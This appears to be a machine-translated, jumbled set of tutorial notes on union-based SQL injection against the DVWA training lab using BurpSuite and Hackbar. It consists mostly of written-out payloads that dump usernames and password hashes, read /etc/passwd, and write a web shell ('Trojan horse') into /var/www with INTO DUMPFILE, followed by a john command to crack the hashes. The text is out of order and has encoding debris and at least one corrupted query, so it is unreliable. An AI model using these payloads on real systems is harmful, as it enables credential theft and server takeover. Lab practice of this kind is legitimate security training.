
Turn on the function of BurpSuite truncation proxy, and submit numbers randomly in the web page, proxy > send to repeater ' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'. ' union select null,"" INTO DUMPFILE "/var/www/a.php". It dumps the input into the server system in the form of a file, followed by the specified placement path. Trojan horse, INTO DUMPFILE is a default integrated function of mysql database management system. ' union select null, load_file('/etc/passwd'). Using load in database management_ File() function 1. The next step is to complete it in burpsuuite. Hackbar is a good tool, but the burpseuite with truncation agent function is more convenient.
#Sql injection tool kali linux login password
' union select null,concat(user,0x3a,password) from users-+ The display format changes and the content is the sameĬrack password based on Hash john -format=raw-MD5 /root/Desktop/12/dw1.txt -show ' union select user,password from users-+ When querying the current database, the name of the table can be written directly instead of the name of the database Query user,password The contents of the column ' union select table_name,column_name from information_lumns where table_schema='dvwa' and table_name='users'-+ User All columns in the table( user_id,first_name,last_name,user\password\avatar)

' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'-+ ' union select table_schema,count(*) from information_schema.tables group by table_schema-+

' union select table_name,table_schema from information_schema.tables-+Ĭount the number of tables in each database The hackbar plug-in is very convenient to modify the url 'union select user(),database() - database nameĬonnection string: CONCAT_WS(CHAR(32,58,32),user(),database(),version()) 'union select user(),version() - queries the current user and database version The select query statement is as follows: select first_name,surname from users where id ='1' union select user(),2- ' Query results: according to the results, you can locate the fields in which First name and Surname are located.ġ 'union select user(), 2 - replace the 1 field with the function user() to query the user of the current database The select query statement is as follows: select first_name,surname from users where id ='' union select 1,2- ' 'union select 1,2 - close the server side', and determine where the query results of fields 1 and 2 will appear on the page.


